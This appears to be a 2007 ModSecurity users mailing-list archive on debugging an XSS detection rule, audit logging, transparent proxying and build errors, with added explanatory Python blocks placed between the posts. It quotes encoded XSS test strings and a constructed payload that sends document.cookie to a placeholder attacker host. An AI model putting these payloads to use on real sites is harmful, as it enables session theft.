Ofer Shezaf | 1 Aug 06:33

Re: Fwd: rules

Alert and script are common English words and do not, by themselves, serve as a good enough signature for XSS. The rule below requires “alert” or “script” in combination with other factors. For example “<script” would be enough.

 

Now your test vector includes “<script” but encodes “<” as /u003c. While ModSecurity does compensate for common encoding evasion techniques, I have never encountered this one before and therefore wonder whether it is really a valid attack string. If I understood well from a previous e-mail, this attack vector was generated by Watchfire’s AppScan, so I am checking with them to see what this attack vector is all about.

 

Another important note is that alert seldom indicates a real XSS attack, though it is common to XSS testing. After all, I don’t know many attackers who would want to display a pop up to the attacked user.

 

~ Ofer

 

From: mod-security-users-bounces <at> lists.sourceforge.net [mailto:mod-security-users-bounces <at> lists.sourceforge.net] On Behalf Of love wadhwa
Sent: Monday, July 30, 2007 10:48 PM
To: mod-security-users <at> lists.sourceforge.net
Subject: [mod-security-users] Fwd: rules

 



---------- Forwarded message ----------
From: love wadhwa <lovewadhwa <at> gmail.com>
Date: Jul 31, 2007 11:17 AM
Subject: Re: [mod-security-users] rules
To: Ryan Barnett <Ryan.Barnett <at> breach.com>

Hi
This is what I have in my rules file. I only have a single rule for XSS. I haven't specified any encoding. Now, with the following specified, when I run a scanner it should have caught that URL, since it has the keyword "alert" or "script" in it and I have specified these keywords in my rules. But I am not seeing it being caught and logged to another file, i.e. audit.log.

SecRuleEngine On
SecAuditEngine RelevantOnly
SecAuditLog logs/audit.log
SecAuditLogType serial
SecAuditLogParts ABIFHZ
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|script|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b| [vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:\.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\@import)\b)"

 

On 7/30/07, Ryan Barnett < Ryan.Barnett <at> breach.com> wrote:

Are you attempting to bypass or evade this XSS rule by using Unicode encoding?  It looks like this is the case, however there are forward slashes instead of % signs:

 

http://www.example.com/cgi-bin/foo.php?p=%u003Cscript%u003Ealert%u0028%u0027XSS%u0020Test%u0020Successful%u0027%u0029%u003C%script%u003E

 

Another thing to keep in mind with regards to evasion tests, and this is especially true with XSS, is that while you may be able to evade the rules the malicious code still needs to be in a format that the backend web application (or in the case of XSS the client browser) will execute.  I don't believe that a browser would execute the code snippet you provided.

 

--
Ryan C. Barnett
ModSecurity Community Manager

Breach Security: Director of Application Security Training
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC

Author: Preventing Web Attacks with Apache

 

 

From: mod-security-users-bounces <at> lists.sourceforge.net [mailto:mod-security-users-bounces <at> lists.sourceforge.net] On Behalf Of love wadhwa
Sent: Monday, July 30, 2007 5:34 AM
To: mod-security-users <at> lists.sourceforge.net
Subject: [mod-security-users] rules

 

hi
I have been using the following rules in my conf file.

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|script|alert|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b| [vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:\.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\@import)\b)"

Although I do have the "script" and "alert" keywords in my rules as a filter, I am still getting the following URL with status code 200:
/u003Cscript/u003Ealert/u0028/u0027XSS/u0020Test/u0020Successful/u0027/u0029/u003C/script/u003E

Please help me regarding the same and see if some changes have to be made in the rules.
--
Warm Regards
Love Wadhwa
RedHat Certified Engg




--
Warm Regards
Love Wadhwa
RedHat Certified Engg



--
Warm Regards
Love Wadhwa
RedHat Certified Engg

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
_______________________________________________
mod-security-users mailing list
mod-security-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
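The decoding question in the thread above (Ryan's slash-versus-percent point, and Ofer's point that "alert" and "script" on their own do not fire the rule), as an added example that is not part of the thread and not ModSecurity's code: a Python re-implementation of a %u-aware URL decoder in the spirit of ModSecurity's t:urlDecodeUni transformation, run together with a small subset of the posted regular expression over constructed payloads. The payload strings, the attacker.invalid host and the decoder are constructed for illustration; only the regular-expression fragments come from the rule above, and the t:lowercase step in the default pipeline is an assumption (the posted rule carries no transformations of its own).

```python
import re

# Constructed test payloads, modelled on the strings in the thread above.
# SLASH_U is the scanner output as it reached the list; PERCENT_U is the same
# payload with IIS-style %uHHHH escapes (what the scanner most likely sent);
# the rest are for comparison. attacker.invalid is a placeholder host.
SLASH_U = ("/u003Cscript/u003Ealert/u0028/u0027XSS/u0020Test/u0020Successful"
           "/u0027/u0029/u003C/script/u003E")
PERCENT_U = ("%u003Cscript%u003Ealert%u0028%u0027XSS%u0020Test%u0020Successful"
             "%u0027%u0029%u003C/script%u003E")
PLAIN = "<script>alert('XSS')</script>"
NO_ALERT = ("<body onload=\"document.location='http://attacker.invalid/?c='"
            "+document.cookie\">")
PROSE = "please alert the team before the script runs"

# Subset of the posted XSS regular expression: only the "alert(", "<script"/
# "<meta" and "on<event>=" branches. The real rule has many more alternatives,
# but these are the ones the thread is arguing about. Like the posted rule it
# is all lower-case, so it relies on a lowercase transformation to catch
# "<SCRIPT>".
XSS_SUBSET = re.compile(
    r"(?:\balert\b\W*?\(|<(?:script|meta)"
    r"|\bon(?:(?:un)?load|click|submit|focus|blur)\b\W*?=)"
)

# "%uHHHH" (IIS-specific) or "%HH"; anything else, including "/uHHHH", is left
# untouched, which is exactly why the slash-u payload never turns into "<".
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def url_decode_uni(value: str) -> str:
    """Single-pass URL decoder with %u support, in the spirit of ModSecurity's
    t:urlDecodeUni transformation (a re-implementation, not ModSecurity's code)."""
    def repl(match):
        code = match.group(1) or match.group(2)
        return chr(int(code, 16))
    return _ESCAPE.sub(repl, value).replace("+", " ")


def rule_matches(raw: str, transformations=(url_decode_uni, str.lower)) -> bool:
    """Run the transformation pipeline, then the regex, the way a SecRule with
    t:urlDecodeUni,t:lowercase would. Pass transformations=() to see what the
    regex does against the raw, undecoded argument."""
    value = raw
    for transform in transformations:
        value = transform(value)
    return XSS_SUBSET.search(value) is not None


def classify(payloads: dict) -> dict:
    """Map each payload name to (matches_raw, matches_after_transforms)."""
    return {name: (rule_matches(p, transformations=()), rule_matches(p))
            for name, p in payloads.items()}


SAMPLES = {"slash_u": SLASH_U, "percent_u": PERCENT_U, "plain": PLAIN,
           "no_alert": NO_ALERT, "prose": PROSE}

if __name__ == "__main__":
    for name, (raw_hit, decoded_hit) in classify(SAMPLES).items():
        print(f"{name:10s} raw={raw_hit!s:5s} "
              f"after t:urlDecodeUni,t:lowercase={decoded_hit}")
```

Run stand-alone it prints one line per sample. The slash-u string never matches, decoded or not, because no decoder turns "/u003C" into "<" and the "alert" is not followed by "(". The %u variant matches only after decoding, the prose sentence never does, and the cookie-stealing payload with no "alert" in it is caught by the "onload=" branch, which is the shape of a real attack rather than a scanner probe.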
Emre | 1 Aug 15:08

modsecurity rpm package

Hi all,

 

I would like to know if there is an RPM package of ModSecurity 2.* for the RedHat 4 EL edition.

 

It would be sensible if any of you responded to me.

 

See you all later.

Alexandre SALEM | 1 Aug 16:34

mod_security on winNt send concurrent log to the console

Hi guys,

Thanks for your fast answer. I think I've noticed a bug on Windows.

It seems that my defined SecAuditLogParts doesn't work. I still have the E part with the full source code of a 200 OK request.

Here is my current config :

SecAuditEngine RelevantOnly
SecAuditLogType serial
SecAuditLogParts ABIFHZ
SecAuditLogRelevantStatus "^(?:5|40[^4]|4[1-9]\d)"
SecAuditLog e:/auditlog/sec.log

What do you think?

Alex

2007/7/31, Brian Rectanus <Brian.Rectanus <at> breach.com >:
Alexandre SALEM wrote:
> Hi Brian,

Hi

> I'm Alex, a member of the mod_security mailing list. On my Apache server
> (win32), my console gets no information from the Auditlog and I don't
> know why. But I'm able to run this perl script with the Windows prompt.


Yeah, this seems to be a bug in Apache on windows.


> I looked at this topic but I have not found an answer:
> http://article.gmane.org/gmane.comp.apache.mod-security.user/3463
>
> How can I send this concurrent log to the console?


There is a solution in the archives:

http://sourceforge.net/mailarchive/message.php?msg_name=46850E1B.4020208%40breach.com

And I think Aleks has this for download here:

http://www.securitylab.ru/_download/software/modsec-auditlog-collector.pl

-B


--
Brian Rectanus
Breach Security

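The audit-logging decision that the config above turns on, as an added model that is not ModSecurity's code and not part of the thread: SecAuditEngine RelevantOnly writes a transaction when a rule produced a warning or error, or when the response status matches SecAuditLogRelevantStatus; the parts letters then decide what goes into the entry. The pattern and the parts string are the ones posted; the decision function and the status table are a re-implementation for illustration.

```python
import re

# SecAuditLogRelevantStatus pattern exactly as posted above.
RELEVANT_STATUS = re.compile(r"^(?:5|40[^4]|4[1-9]\d)")

# Meaning of the SecAuditLogParts letters used in the config (ModSecurity 2.x).
PART_NAMES = {
    "A": "audit log header",
    "B": "request headers",
    "C": "request body",
    "E": "intermediary (intended) response body",
    "F": "final response headers",
    "H": "audit log trailer",
    "I": "reduced multipart request body (replaces C)",
    "Z": "final boundary",
}


def status_is_relevant(status: int) -> bool:
    r"""True when the response status matches SecAuditLogRelevantStatus.
    The pattern is anchored only at the start, so '5' covers every 5xx,
    '40[^4]' covers 400-409 except 404, and '4[1-9]\d' covers 410-499."""
    return RELEVANT_STATUS.search(str(status)) is not None


def should_audit(engine: str, status: int, rule_triggered: bool) -> bool:
    """Model of the SecAuditEngine decision: Off logs nothing, On logs every
    transaction, RelevantOnly logs when a rule produced a warning/error or the
    status is relevant. Re-implementation for illustration, not ModSecurity's."""
    if engine == "Off":
        return False
    if engine == "On":
        return True
    if engine == "RelevantOnly":
        return rule_triggered or status_is_relevant(status)
    raise ValueError(f"unknown SecAuditEngine value: {engine}")


def parts_to_log(spec: str) -> list:
    """Expand a SecAuditLogParts value such as 'ABIFHZ' into part names."""
    unknown = [p for p in spec if p not in PART_NAMES]
    if unknown:
        raise ValueError(f"unknown part letter(s): {''.join(unknown)}")
    return [PART_NAMES[p] for p in spec]


def relevant_codes(codes=range(100, 600)) -> list:
    """All status codes in the range that the posted pattern treats as relevant."""
    return [c for c in codes if status_is_relevant(c)]


if __name__ == "__main__":
    print("relevant statuses:", relevant_codes())
    print("200 OK with a rule match, RelevantOnly:",
          should_audit("RelevantOnly", 200, True))
    print("parts written:", parts_to_log("ABIFHZ"))
```

The point worth keeping in mind when reading audit.log entries for 200 responses: under RelevantOnly a 200 is still written whenever a rule matched during that transaction, so the status pattern alone does not explain which requests appear.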
Jason Haar | 1 Aug 21:19

transparent proxy support in Apache?

Hi there

I'm making a WAF (Web Application Firewall)  based around Linux/Apache
and mod_security, and as part of the design, thought that making it a
transparent (reverse) proxy would be a good move from a disaster
recovery perspective (i.e. if it blew up you could just wire around it
and the backends would still be available).

Anyway, I did some quick tests with Apache (2.2.4) and found that it
really has no transparent proxy support? I can get the iptables rules in
place to redirect traffic meant for other servers to terminate on it -
but Apache reads them all as connections to itself - i.e. the
VirtualHosts don't kick in correctly.

Also, the WAF would primarily be used to protect HTTPS sites. Now I know
"you can't transparently proxy HTTPS" is the mantra -  but that's not
quite true from what I know. I mean, this would be an "official" WAF - so
it would have copies of the server certs used on the real backends - so
it could actually do a successful "man-in-the-middle". But again it
relies on Apache to be able to glean information about the real
destination IP addresses so that it could map connections through to the
real backend server. I guess Apache would need a "VirtualListen" option...

I've done this successfully with Squid as a normal proxy, but I really
need the funky features of Apache as a reverse-proxy - but I want
transparency too...

Is it doable? Thanks!

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1

Ryan Barnett | 1 Aug 23:07

Re: transparent proxy support in Apache?

This is possible to do but it is not trivial to recode.  If you don't have the time/resources to do this
yourself you might want to consider the just released M1100 appliance by Breach.  It can function as a
transparent bridge.

Check out the Breach site for more info - http://www.breach.com/products/modsecuritypro_m1100.html

Thanks,
Ryan C. Barnett 

----- Original Message -----
From: mod-security-users-bounces <at> lists.sourceforge.net <mod-security-users-bounces <at> lists.sourceforge.net>
To: mod-security-users <at> lists.sourceforge.net <mod-security-users <at> lists.sourceforge.net>
Sent: Wed Aug 01 15:19:47 2007
Subject: [mod-security-users] transparent proxy support in Apache?

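The piece Jason says Apache is missing (a way to learn the real destination of a connection that iptables redirected to the WAF, so that the right VirtualHost, and for HTTPS the right certificate, can be chosen), as an added Python illustration that is not part of the thread, of Apache or of the Breach appliance: on Linux the kernel remembers the pre-NAT destination of a REDIRECTed TCP connection and hands it back through the SO_ORIGINAL_DST socket option. The BACKENDS table, the addresses, the iptables rule in the comment and the listening port are assumptions; the sockaddr_in bytes are constructed to match what the kernel returns.

```python
import socket
import struct

# Linux constants from <linux/netfilter_ipv4.h>; SO_ORIGINAL_DST is not
# exposed by Python's socket module, so it is spelled out here. The matching
# iptables rule would be something like (assumption, adjust to the site):
#   iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
SOL_IP = 0
SO_ORIGINAL_DST = 80

# Hypothetical mapping from the address clients were really talking to, to the
# backend that owns it. In a TLS deployment the same key would also select the
# copy of that site's certificate the proxy presents before forwarding.
BACKENDS = {
    ("192.0.2.10", 80): ("10.0.0.5", 8080),
    ("192.0.2.10", 443): ("10.0.0.5", 8443),
    ("192.0.2.11", 443): ("10.0.0.6", 8443),
}


def parse_sockaddr_in(raw: bytes):
    """Decode the struct sockaddr_in returned by SO_ORIGINAL_DST into (ip, port).
    Layout: sa_family (2 bytes, host order), sin_port (2 bytes, network order),
    sin_addr (4 bytes), then 8 bytes of zero padding."""
    if len(raw) < 8:
        raise ValueError("short sockaddr_in")
    (family,) = struct.unpack("=H", raw[:2])
    if family != socket.AF_INET:
        raise ValueError(f"unexpected address family {family}")
    port, addr = struct.unpack("!H4s", raw[2:8])
    return socket.inet_ntoa(addr), port


def original_destination(conn: socket.socket):
    """Ask the kernel where a REDIRECTed connection was originally going.
    Only meaningful on Linux for a socket accepted on a REDIRECT target port."""
    return parse_sockaddr_in(conn.getsockopt(SOL_IP, SO_ORIGINAL_DST, 16))


def backend_for(dest, table=BACKENDS):
    """Pick the backend for an original destination. None means the address is
    not one of ours, which is the case to fail closed on rather than proxy a
    client to whatever host it asked for."""
    return table.get(dest)


# Constructed sockaddr_in bytes, as the kernel would return them for a client
# that was connecting to 192.0.2.10:443 before iptables redirected it to us.
SAMPLE_SOCKADDR = (struct.pack("=H", socket.AF_INET)
                   + struct.pack("!H4s", 443, socket.inet_aton("192.0.2.10"))
                   + bytes(8))


def serve(listen_port: int = 8080) -> None:
    """Accept loop: learn the real destination, pick the backend, log it.
    Forwarding (and TLS termination with the right certificate) would follow."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", listen_port))
        srv.listen(16)
        while True:
            conn, peer = srv.accept()
            with conn:
                dest = original_destination(conn)
                target = backend_for(dest)
                print(f"{peer} wanted {dest} -> backend {target}")
                if target is None:
                    continue  # not one of our sites: drop, do not relay


if __name__ == "__main__":
    dest = parse_sockaddr_in(SAMPLE_SOCKADDR)
    print(dest, "->", backend_for(dest))
```

Run stand-alone it decodes the constructed sample without needing iptables; serve() only works on a Linux host where a REDIRECT rule is in place. Whatever does the lookup, a reverse proxy in this position must refuse destinations it does not own, otherwise a transparent WAF becomes an open relay.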
Lund, Holly | 2 Aug 13:23

Problem compiling on Solaris 10

Using Solaris apache pkgs and SUNWspro

Get the following error:

cc: illegal option -Wuninitialized
*** Error code 1
make: Fatal error: Command failed for target `mod_security2.slo'

Any ideas?

It didn't work with gcc either... I got a __divid3 symbol reference error.

Holly Lund
301-903-1174

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
_______________________________________________
mod-security-users mailing list
mod-security-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
MIKE YRABEDRA | 2 Aug 16:09

Install error on intel xserve


I am attempting to install ms2 with apache 2.2.4 on Mac OS X server.

Here is the error I get at the very end...

secure4:/usr/local/src/modsecurity-apache_2.1.1/apache2 root# make install
/usr/local/apache2/build/libtool --silent --mode=install cp mod_security2.la
/usr/local/apache2/modules/
Warning!  dlname not found in /usr/local/apache2/modules/mod_security2.la.
Assuming installing a .so rather than a libtool archive.

I have seen this mentioned in the list archive, but never a solution.

Here is the config I used to build Apache, if that will help:

$ root ./configure --prefix=/usr/local/apache2 --enable-access \
--enable-actions --enable-alias --enable-asis --enable-auth \
--enable-auth_dbm --enable-auth_digest --enable-autoindex \
--enable-cache --enable-cgi --enable-dav --enable-dav_fs \
--enable-deflate --enable-dir --enable-disk_cache \
--enable-dumpio --enable-env --enable-expires --enable-fastcgi \
--enable-file_cache --enable-headers --enable-imap \
--enable-include --enable-info --enable-log_config \
--enable-log_forensic --enable-logio --enable-mem_cache --enable-mime \
--enable-mime_magic --enable-negotiation --enable-perl \
--enable-rewrite --enable-setenvif --enable-speling --enable-ssl \
--enable-status --enable-suexec --enable-unique_id --enable-userdir \
--enable-usertrack --enable-version --enable-vhost_alias --enable-so \
--enable-module=all --enable-shared=max

-- 
Mike B^)>

Mike Yrabedra | 3 Aug 01:03

Re: Install error on intel xserve


It should be noted that I was able to install the php5 .so with no problems.

I have googled as much as I can, no joy.

Does ModSecurity not support Mac OS X ?

on 8/2/07 10:09 AM, MIKE YRABEDRA at lists <at> 323inc.com wrote:

-- 
Mike Yrabedra B^)>

Alexandre SALEM | 3 Aug 08:40

How can I get rid of this error?

Hi guys,

When a robot scans my server I always get this error:

Message: Warning. Match of "rx OPTIONS" against "REQUEST_METHOD" required. [id "960015"] [msg "Request Missing an Accept Header"] [severity "CRITICAL"]

How can I get rid of this message?

Thanks all

Tim Simpson | 3 Aug 16:47

Mod_Security console installing on XP

Hello,

Hopefully someone can help me.

I have downloaded the mod_security console from the Breach website and have
installed it on my Windows XP SP2 system,

but the service will not start.

It displays the message "Error 1 incorrect function".

Does anyone know what this might mean and how to go about fixing it?

I'm not too clear about where the console should be installed: are you supposed
to install it on the web server that mod_security is running on, or can you use
any device and then point the console at that system?

Any help gratefully received.

Tim
